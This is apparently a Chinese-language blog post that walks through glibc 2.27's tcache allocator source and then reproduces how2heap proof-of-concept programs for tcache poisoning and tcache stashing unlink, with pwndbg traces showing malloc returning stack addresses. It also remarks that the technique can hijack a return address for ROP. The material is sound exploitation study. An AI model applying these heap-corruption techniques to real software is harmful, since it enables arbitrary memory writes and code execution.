dustland

dustball in dustland

glibc2.27 tcache

tcache

glibc2.26之后

"如为死狂,则事无不成。"--<<最后的武士>>

datastructure

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS 64
# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables. */
# define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
//根据tcache下标求解其中堆块的大小
/* When "x" is from chunksize(). */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
//根据堆块大小求解对应tcache下标
/* When "x" is a user-provided size. */
# define usize2tidx(x) csize2tidx (request2size (x))
//根据堆块的mem区大小,首先计算得到堆块的整体大小(包括元数据)然后计算对应tcache下标
/* With rounding and alignment, the bins are...
idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
idx 1 bytes 25..40 or 13..20
idx 2 bytes 41..56 or 21..28
etc. */

/* This is another arbitrary limit, which tunables can change. Each
tcache bin will hold at most this number of chunks. */
# define TCACHE_FILL_COUNT 7
tcache桶子下标 mem大小范围
0 0x18
1
2
...
63

tcache_perthread_struct类定义

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread bool tcache_shutting_down = false;
static __thread tcache_perthread_struct *tcache = NULL;

typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;
//本堆块的mem区域第一个int被复用为next指针
//单向链表,next指针指向下一个空闲堆块的mem区域

每个线程都有自己的tcache

也就是说,一个线程有一个tcache_perthread_struct结构体

counts[tidx]是计数器,记录tidx下标的tcache桶子中有几个堆块

entries[tidx]是链表头,指向tidx桶子中的第一个堆块

每个桶子中最多有TCACHE_FILL_COUNT=7个堆块,每个tcache_perthread_struct中有64个桶子

image-20231027112655389

成员函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)//将chunk放到tc_idx下标的tcache中
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);//tcache_entry指针指向mem区,而不是基地址
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];//头插法
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);//tc_idx对应计数器自增
}

/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)//从tc_idx桶子中拿出一个堆块
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}

static void
tcache_thread_shutdown (void)
{//线程死亡时释放这个线程的tcache,实际上调用free函数释放该线程的tcache中的堆块
int i;
tcache_perthread_struct *tcache_tmp = tcache;

if (!tcache)
return;

/* Disable the tcache and prevent it from being reinitialized. */
tcache = NULL;
tcache_shutting_down = true;

/* Free all of the entries and the tcache itself back to the arena
heap for coalescing. */
for (i = 0; i < TCACHE_MAX_BINS; ++i)
{
while (tcache_tmp->entries[i])
{
tcache_entry *e = tcache_tmp->entries[i];
tcache_tmp->entries[i] = e->next;
__libc_free (e);
}
}

__libc_free (tcache_tmp);
}

static void
tcache_init(void)
{
mstate ar_ptr;
void *victim = 0;
const size_t bytes = sizeof (tcache_perthread_struct);
//tcache_perthread_struct这个结构本身就是堆上分配的一个堆块

if (tcache_shutting_down)
return;

arena_get (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
if (!victim && ar_ptr != NULL)
{
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}


if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);

/* In a low memory situation, we may not be able to allocate memory
- in which case, we just keep trying later. However, we
typically do this very early, so either there is sufficient
memory, or there isn't enough memory to do non-trivial
allocations anyway. */
if (victim)
{
tcache = (tcache_perthread_struct *) victim;
memset (tcache, 0, sizeof (tcache_perthread_struct));
}

}


algorithm

调用malloc的过程是这样的:

1
2
3
4
malloc
->libc_malloc
->use tcache
->int_malloc

如果在libc_malloc中使用tcache能够完成分配,则不需要调用int_malloc

1
2
3
启用tcache后,分配过程宏观上看是这样的
如果libc_malloc中,发现对应tcache中有合适的堆块,直接拿出来返回
否则需要调用int_malloc,对bins中的堆块进行缓存和分类,然后返回

libc_malloc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;
....
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);//计算应该到哪个tcache中取堆块

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins //tc_idx是否落在tcache范围内,也就是说堆块大小是不是在tcache管理范围内
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache //是否已经初始化
&& tcache->entries[tc_idx] != NULL) //对应的桶子中是否有剩余堆块
{
return tcache_get (tc_idx); //哪一个堆块,返回值,由于tcache中指针自然指向mem区域,因此不需要再指针转换
}
DIAG_POP_NEEDS_COMMENT;
#endif
....

int_malloc

fastbin和smallbin的缓存算法基本一致

unsortedbin的缓存算法比较复杂

largebin不需要缓存

对fastbin的缓存

fastbin中的分配规则为:

1
2
3
如果对应nb的fastbin中有至少一个堆块,首先把这个堆块拿出来放到victim上
然后把这个桶子中其他堆块拆下来,塞进tcache,直到tcache的对应桶子中塞满7个为止
最后返回那个victim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

if ((unsigned long)(nb) <= (unsigned long)(get_max_fast()))
{
idx = fastbin_index(nb);
mfastbinptr *fb = &fastbin(av, idx);
mchunkptr pp;
victim = *fb;

if (victim != NULL)
{
if (SINGLE_THREAD_P)//单线程的情况
*fb = victim->fd;
else//多线程的情况
REMOVE_FB(fb, pp, victim);//首先拿出一个堆块来
if (__glibc_likely(victim != NULL))
{
size_t victim_idx = fastbin_index(chunksize(victim));
if (__builtin_expect(victim_idx != idx, 0))
malloc_printerr("malloc(): memory corruption (fast)");
check_remalloced_chunk(av, victim, nb);
#if USE_TCACHE //已经拿出了一个符合要求的堆块,剩余的堆块放到tcache中缓存(直到tcache满),如果tcache满了就不再往里塞了
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB(fb, pp, tc_victim);
if (__glibc_unlikely(tc_victim == NULL))
break;
}
tcache_put(tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}
}

对smallbin的缓存

smallbin的分配规则

1
2
3
如果对应smallbin中有至少一个堆块,把他拿下来放到victim上
该smallbin桶子中剩余的堆块放到对应tcache上,直到放满7个
最后返回victim
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
  if (in_smallbin_range(nb))
{
idx = smallbin_index(nb);
bin = bin_at(av, idx);

if ((victim = last(bin)) != bin)//首先取出一个last(bin)堆块来给victim
{
bck = victim->bk;
if (__glibc_unlikely(bck->fd != victim))
malloc_printerr("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset(victim, nb);
bin->bk = bck;//将victim从链上摘下来
bck->fd = bin;

if (av != &main_arena)
set_non_main_arena(victim);
check_malloced_chunk(av, victim, nb);
#if USE_TCACHE //本桶子中剩余的堆块塞进tcache,塞满7个为止,多余的仍在smallbin中放着
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx(nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last(bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset(tc_victim, nb);
if (av != &main_arena)
set_non_main_arena(tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put(tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
}

对unsortedbin的缓存

对unsortedbin的缓存算法是这样的:

1
2
3
4
5
6
7
8
拿出一个victim,如果是last_remainder,并且大小合适,则直接从其上进行分割然后 返回,不会进行缓存
否则
如果victim大小正好满足要求,不急着返回,而是首先尝试将其放到tcache中缓存
如果tcache有空位置则放进去,然后tcache_nb置1表明至少tcache中有一个适配堆块
如果tcache没有位置则直接 返回
如果victim大小不满足要求,则根据其大小放到smallbin或者largebin
如果tcache_nb标志为1,并且在unsortedbin中转了足够多圈了,从tcache_nb 返回
否则重新循环
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
    while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av))//每次拿出一个堆块交给victim
{
bck = victim->bk;
if (__builtin_expect(chunksize_nomask(victim) <= 2 * SIZE_SZ, 0) || __builtin_expect(chunksize_nomask(victim) > av->system_mem, 0))
malloc_printerr("malloc(): memory corruption");
size = chunksize(victim);

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/

if (in_smallbin_range(nb) &&
bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long)(size) > (unsigned long)(nb + MINSIZE))
{//如果是last_remainder则直接分配,此时不会再进行tcache缓存,推测原因是last_remainder刚用过,还在内存中,命中概率大
/* split and reattach remainder */
remainder_size = size - nb;
remainder = chunk_at_offset(victim, nb);
unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks(av);
if (!in_smallbin_range(remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

set_head(victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head(remainder, remainder_size | PREV_INUSE);
set_foot(remainder, remainder_size);

check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
}
//不是last_remainder
/* remove from unsorted list */
unsorted_chunks(av)->bk = bck;//把victim拆下来
bck->fd = unsorted_chunks(av);

/* Take now instead of binning if exact fit */

if (size == nb)//如果当前堆块的大小符合要求,不会立刻分配,首先应该放到tcache中
{
set_inuse_bit_at_offset(victim, size);
if (av != &main_arena)
set_non_main_arena(victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put(victim, tc_idx);
return_cached = 1;//记录至少有一个堆块放到了tcache,待会儿就可以从tcache中拿堆块了
continue; //continue直接跳到while一开始拿下一个堆块了
}
else//直到对应tcache存满了才会直接进行分配
{
#endif
check_malloced_chunk(av, victim, nb);
void *p = chunk2mem(victim);
alloc_perturb(p, bytes);
return p;
#if USE_TCACHE
}
#endif
}
//到此说明victim既不是last_remainder,大小也不是正合适
/* place chunk in bin */

if (in_smallbin_range(size))//如果victim是smallbin范围的
{
victim_index = smallbin_index(size);//放进smallbin
bck = bin_at(av, victim_index);
fwd = bck->fd;
}
else//否则说明是largebin中的,放到largebin,不会进入smallbin
{
victim_index = largebin_index(size);
bck = bin_at(av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert(chunk_main_arena(bck->bk));
if ((unsigned long)(size) < (unsigned long)chunksize_nomask(bck->bk))
{
fwd = bck;
bck = bck->bk;

victim->fd_nextsize = fwd->fd;
victim->bk_nextsize = fwd->fd->bk_nextsize;
fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
}
else
{
assert(chunk_main_arena(fwd));
while ((unsigned long)size < chunksize_nomask(fwd))
{
fwd = fwd->fd_nextsize;
assert(chunk_main_arena(fwd));
}

if ((unsigned long)size == (unsigned long)chunksize_nomask(fwd))
/* Always insert in the second position. */
fwd = fwd->fd;
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
else
victim->fd_nextsize = victim->bk_nextsize = victim;
}

mark_bin(av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;

#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;//unsortedbin中最大可以容忍的缓存次数
if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get(tc_idx);
}//结算阶段,如果return_cached是正合适大小的堆块入tcache的标记,如果被置1说明至少能从tcache中找到一个合适的堆块
#endif

#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;//unsortedbin这里的循环最多10000次
}

跳出unsortedbin循环,再检查一次tcache中是否有合适堆块

1
2
3
4
5
6
7
8

#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get(tc_idx);
}
#endif

后面使用largebin和topchunk进行分配时不会有tcache的缓存使用了

int_free

释放时的tcache操作很简单,只在int_free中有一个

1
2
3
4
5
6
7
8
9
10
11
#if USE_TCACHE
{
size_t tc_idx = csize2tidx(size);

if (tcache && tc_idx < mp_.tcache_bins && tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put(p, tc_idx);
return;
}
}
#endif

如果这堆块的大小在tcache的管理范围内,那么在一切释放工作开始之前,首先尝试将这个堆块放到tcache中

如果缓存则直接返回

how2heap

tcache_poisoning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>

int main()
{
// disable buffering
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n"
"returning a pointer to an arbitrary location (in this case, the stack).\n"
"The attack is very similar to fastbin corruption attack.\n");
printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n"
"We have to create and free one more chunk for padding before fd pointer hijacking.\n\n");

size_t stack_var;
printf("The address we want malloc() to return is %p.\n", (char *)&stack_var);

printf("Allocating 2 buffers.\n");
intptr_t *a = malloc(128);
printf("malloc(128): %p\n", a);
intptr_t *b = malloc(128);
printf("malloc(128): %p\n", b);

printf("Freeing the buffers...\n");
free(a);
free(b);

printf("Now the tcache list has [ %p -> %p ].\n", b, a);
printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n"
"to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var);
b[0] = (intptr_t)&stack_var;
printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var);

printf("1st malloc(128): %p\n", malloc(128));
printf("Now the tcache list has [ %p ].\n", &stack_var);

intptr_t *c = malloc(128);
printf("2nd malloc(128): %p\n", c);
printf("We got the control\n");

assert((long)&stack_var == (long)c);
return 0;
}

两个malloc然后两个free之后,两个堆块就放到tcache中了

如果没有tcache,这俩都应该放在fastbin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x8403000
Size: 0x251

Free chunk (tcache) | PREV_INUSE
Addr: 0x8403250
Size: 0x91
fd: 0x00

Free chunk (tcache) | PREV_INUSE
Addr: 0x84032e0
Size: 0x91
fd: 0x8403260

Top chunk | PREV_INUSE
Addr: 0x8403370
Size: 0x20c91

pwndbg> tcache
{
counts = "\000\000\000\000\000\000\000\002", '\000' <repeats 55 times>,
entries = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x84032f0, 0x0 <repeats 56 times>}
}
pwndbg> tcachebin
tcachebins
0x90 [ 2]: 0x84032f0 —▸ 0x8403260 ◂— 0x0
1
2
3
flowchart LR
t["tcachebin[idx]"]---->b["b@0x84032f0"]---->a["a@0x8403260"]---->null

此时b[0]就是其指向a的next指针,直接修改b[0]就可以玩坏tcache

1
2
3
pwndbg> tcachebins
tcachebins
0x90 [ 2]: 0x84032f0 —▸ 0x7ffffffedde8 ◂— 0x0

这就把栈上的stack_var@0x0x7ffffffedde8连接到tcache上了

下一次分配会拿走b

1
2
3
flowchart LR
t["tcachebin[idx]"]---->stack_var["stack_var@0x0x7ffffffedde8"]---->null

再下一次分配c就会拿走stack_var

也就是说c指向0x0x7ffffffedde8这个地址

1
2
pwndbg> p c
$1 = (intptr_t *) 0x7ffffffedde8

如果我们把b[0] = (intptr_t)&stack_var;

改成b[0] = (intptr_t)&rip;也就是篡改了函数返回地址

然后就可以通过c[0]=&vuln_func进行ROP攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;

setbuf(stdout, NULL);

printf("This file demonstrates the stashing unlink attack on tcache.\n\n");
printf("This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
printf("This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
printf("The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
printf("This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");

// stack_var emulate the fake_chunk we want to alloc to
printf("Stack_var emulates the fake chunk we want to alloc to.\n\n");
printf("First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

stack_var[3] = (unsigned long)(&stack_var[2]);

printf("You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
printf("Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
printf("Now we alloc 9 chunks with malloc.\n\n");

//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

//put 7 chunks into tcache
printf("Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

printf("As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]);

//convert into small bin
printf("Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

malloc(0xa0);// size > 0x90

//now 5 tcache bins
printf("Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

malloc(0x90);
malloc(0x90);

printf("Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

//change victim->bck
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/

//trigger the attack
printf("Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

calloc(1,0x90);

printf("Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

//malloc and return our fake chunk on stack
target = malloc(0x90);

printf("As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);

assert(target == &stack_var[2]);
return 0;
}

首先顺序分配9个堆块

1
2
3
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

然后把[3,8]这六个放到tcache中

1
2
3
for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

然后将1放到tcache中

1
free(chunk_lis[1]);

此时tcache中的结构

1
2
flowchart LR
t["tcache[idx]"]---->1---->8---->7---->6---->5---->4---->3

然后将0和2先后放到unsortedbin上

1
2
free(chunk_lis[0]);
free(chunk_lis[2]);
1
2
flowchart LR
unsortedbin<---->2<---->1

然后分配一个0xa0大小的堆块,显然所有0x90的堆块都不合适,需要到topchunk上切割新的,但是对这个0xa0的分配过程中,会让unsortedbin中的堆块分类

1
2
flowchart LR
smallbin["smallbin[idx]"]<---->1<---->2

然后分配两个0x90,这次命中tcache

1
2
flowchart LR
t["tcache[idx]"]---->5---->4---->3

然后篡改位于smallbin中的2号堆块的bk指针,改成stack_var的地址

1
chunk_lis[2][1] = (unsigned long)stack_var;
1
2
flowchart LR
smallbin["smallbin[idx]"]<---->1<---->2---->stack_var

然后calloc(1,0x90)会绕过lib_malloc,直接调用int_malloc,这就绕过了tcache分配,使用smallbin分配,把1号堆块从smallbin上卸下来,然后将2和伪造的stack_var假堆块放到tcache中

1
2
flowchart LR
t["tcache[idx]"]---->stack_var---->2---->5---->4---->3

此时再分配target = malloc(0x90);就是在libc_malloc中使用tcache进行分配

target拿到的就是一个栈地址了

1
2
3
4
pwndbg> p &stack_var
$3 = (unsigned long (*)[16]) 0x7fffffffd2e0
pwndbg> p target
$4 = (unsigned long *) 0x7fffffffd2f0